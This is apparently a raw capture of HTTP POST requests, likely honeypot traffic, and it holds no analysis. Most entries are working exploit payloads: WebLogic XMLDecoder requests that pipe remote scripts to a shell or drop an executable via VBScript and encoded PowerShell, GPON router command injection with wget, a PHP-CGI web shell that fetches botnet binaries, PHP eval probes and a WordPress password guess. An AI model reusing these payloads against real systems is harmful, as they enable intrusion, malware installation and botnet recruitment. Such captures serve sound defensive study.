objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
≈â$Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÿå(Y›∆√«∆fl

POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

axa=die((string)(111111111*9));

POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

axa=die('Hello, Peppa!'.(string)(111111111*9));

POST http://t5.proxy-checks.com/favicon.ico HTTP/1.1
Host: t5.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
`äQ<Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îêô1Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; EIE10;ENUSMSN; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache

VV6yySAXUpguJ+zZV/BQAnWqDHwY02tjJeQIfjCngnWVCA2HA8mzZo3cC8ScRa/PhUV/fSdLyoY3ste3HdFsuG8/NYkuuOKR7uzVbL5vJEuivWJr49WGxJl3FNvG+f30c4+cFPKLxhuPEg05ChBOrLIjGytaEGMPV/dvGoTOcWMzjm5sLVAxIcMGyOG/pEsXaXuPuyW9oqCEw6izljFgGZn5yiOhxaNnLu+Xw6tuCJeoPf2LPikq8XZak2geu+5IMDKgu4EsbQKLVfbxAmJ1CdXdBoX1mOIPz0WHQGwBnQdcKisOVXwCL9ldTRpN4ZIpLfHTz3eEbjN4RiSYA5clo+686doP6H/taONPgt+yU6IZZplF1vygIyvo1KWH/rQzjYPKEG9gcYB3LIwAJhxEcHPyjBiVyQlLV+rdQA==

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache

SqZakoucbZk/qI03Gh/BBpFpcCE/K1kG05hCz3kRLSmbGvcYaThYkcYQZFBAUBPiLbjJRadNEAkYjALnmda5647eI0cK6wQ9oRppxr0js9LljKShiILfFc36PTVOcuXKfu7ueUEiC6xedK/u8/IGF0rot7php5TA7At5VSrnsmwq9wchzV94hSg39fAAc9j+cf9YNCm20hg0R4UIGhALPxJru+hDftYPzy5wAzqADpvUapW1s++en3TKJu9xYzYvqUnRS8QFQQWqiRi6BGGTGi0wsdPEFh4QnO/aSrlQ+7YKiyNUW+UH1+u5qwaDb9umTLmXdL8yiQGakZf7yLH62aGVs3BNrJkJuBAXq/g0hwMQcxR0vxwWIvv1RD/pZc69hx0=

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 384
Cache-Control: no-cache

Q/BXlI/IYTLaeetXknzamZbIdRG/9IgNIkYtVQpPvjeqsWqytk8zHSCxuXixqbaNseZUvPAdoGuqp4mM8mD2H40pQQPC+4v+OlbsWQWNhITyZCQWL1Uo4pbDKGgaMyphtJrKxl7oonps8IjBjWJgsF//1u0bxwhZ5i4AUj8y25whRvZRE32ZXSd1IpJyU8J7EMItK1v25M4dXgIwrViavbUPStmPOFSy6TiSbKvcFyGP7GqjihlgGbtbWxQhvZ/0Nv1vwUpG1q11YoahiF9H0WdxjmWQNmgu6pkKyss6RiVXlzXtJtxLv/IRPxkHF2nBZ+UPJtNixbWsv4tuqyziZCesJbDh+rJqtmpt9BxvZeeVOFv/lR3753HmPIk78A==

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1063
Content-Type: multipart/form-data; boundary=9Hq9NdsEsV_V-Oq8ggfZjpKqx5Tz2RA79ZgSP
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--9Hq9NdsEsV_V-Oq8ggfZjpKqx5Tz2RA79ZgSP
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--9Hq9NdsEsV_V-Oq8ggfZjpKqx5Tz2RA79ZgSP
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

580119
--9Hq9NdsEsV_V-Oq8ggfZjpKqx5Tz2RA79ZgSP
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

449ed5404433a1c2338a2969c1a54207
--9Hq9NdsEsV_V-Oq8ggfZjpKqx5Tz2RA79ZgSP
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--9Hq9NdsEsV_V-Oq8ggfZjpKqx5Tz2RA79ZgSP
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--9Hq9NdsEsV_V-Oq8ggfZjpKqx5Tz2RA79ZgSP--


POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST http://185.17.73.141:6666/ HTTP/1.0
Content-length: 24
Connection: close



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195



POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMQAuADEANwAuADIAOAAuADEANQAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
a‰ÃÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞-Y›∆√«∆fl

POST http://analytics.seattleclouds.com/trackevent.ashx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: analytics.seattleclouds.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 230

screenSize=2&os=1&username=tculang&osVersion=4.4.4&appId=videolaguanak&param=&deviceModel=Xiaomi+MI+4LTE&connectionType=2&uniqueAppId=com.ramlidev.videolaguanak&publisherid=tashlik&type=2&screenDensity=480&deviceId=6ccc52a8048214f

POST http://p-behacdn.ksmobile.net/du HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: p-behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 126

~ª¥¸
ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcék∆¶iRtc^9;∞êΩúqk?·È{<kZ&=:OdøúèïCiC*8kZ&=0OeBhGAhB*8kZ&=0OoAipaºóº’9j'ØóaKoBcp`B

POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 26



POST http://check.proxyradar.com/azenv.php?auth=149596557049&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2547
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/System32/taskhostxz.exe&quot;&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/System32/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;cscript.exe C:/Windows/System32/getpocc.vbs&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

m=die('Hello, Peppa!'.(string)(111111111*9))

POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9));

POST /command.php HTTP/1.1
Accept: */*
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 208

cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74

POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1833
Connection: close

<?php
echo "Zollard";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
 $disablefunc = str_replace(" ","",$disablefunc);
 $disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
 global $disablefunc;
 $result = "";
 if (!empty($cmd))
 {
  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_resource($fp = popen($cmd,"r")))
  {
   $result = "";
   while(!feof($fp)) {$result .= fread($fp,1024);}
   pclose($fp);
  }
 }
 return $result;
}
myshellexec("rm -rf /tmp/armeabi;wget -P /tmp http://169.254.221.185:58455/armeabi;chmod +x /tmp/armeabi");
myshellexec("rm -rf /tmp/arm;wget -P /tmp http://169.254.221.185:58455/arm;chmod +x /tmp/arm");
myshellexec("rm -rf /tmp/ppc;wget -P /tmp http://169.254.221.185:58455/ppc;chmod +x /tmp/ppc");
myshellexec("rm -rf /tmp/mips;wget -P /tmp http://169.254.221.185:58455/mips;chmod +x /tmp/mips");
myshellexec("rm -rf /tmp/mipsel;wget -P /tmp http://169.254.221.185:58455/mipsel;chmod +x /tmp/mipsel");
myshellexec("rm -rf /tmp/x86;wget -P /tmp http://169.254.221.185:58455/x86;chmod +x /tmp/x86");
myshellexec("rm -rf /tmp/nodes;wget -P /tmp http://169.254.221.185:58455/nodes;chmod +x /tmp/nodes");
myshellexec("rm -rf /tmp/sig;wget -P /tmp http://169.254.221.185:58455/sig;chmod +x /tmp/sig");
myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;");
?>

POST http://check.proxyradar.com/azenv.php?auth=149303143827&a=PSCMN&i=3168963859&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache

SvYIlN/MZi+oWwdCeVnkHQJPYaxcCIdvHnsOl4G4AuoZjMbWiBiQbqBzvZrqmJbqj0AcJXvUvOBx9mqlQsbI7Bucn1KWgscPVjL944ZOS44sk9R2w8wpaHys4J9aWNVOFKu1kgNIbh52uDv9QHBAOhbd5lRcngbTvAyDI6P5cbArz8vy1I5/0vJZojxCMNiba4ngZ15AOfp5Lvv8R/SGQPnKulNZKKzDeGnMWBaQVfxpm+JczdQg4Qco+OlxXqrqoqjX9w6uWTcQfmKKpmVlrebFdmJ2i6JQQC/9mzBJ8Slci8S/cGDmerg/DkqQxk+5pC+TTVHBKyJiC13mdn6TEZB0O6hSx7hvaTDqp/T1b7qaOaa+4MgkbDo0IXyW5vS967ke1ixBMBcD6KWWDQ1coQ==

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache

S61ZwYzPYJJaXP77ODgBJn2D50eFbl8G8kYgnlCBYq+JRukrJ315AY3HApFzQzejUPX/U0cKHBC2ine4fnFCbo9A3/YxJDskmUMfrTwP9gxbZaaVuql6CQdLMwpb23N6cwqr+VwqGV++VH5Gr9QmuJVqwPpsFMHmTUsFJujFZrnChobJ6/w299I1mO53j1pl1g/cDUrOL7/RgDWTTm/H8nLitLzbKHYNx6RtUtNM5pecs087o3KImcikKp2Nxc83BFehgWquN+lhOvTAFjmGbxOC6NCsMgOSfNH1TVLgGcJ6DES2qsbczm05UGcefbiBkD+p7eQ/VsbLIcv9gX6Gz6eF4Zk5B+uOSaQPoJxt0SrNh1uI5LtawZjHiSDGM2lV0kPn8+Yy6Tc2KleBA1lUx6T88qax9HDBeg+t2p8HTeFQCUHqhk4=

POST http://check.proxyradar.com/azenv.php?auth=149394887959&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache

log=admin&pwd=1717

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
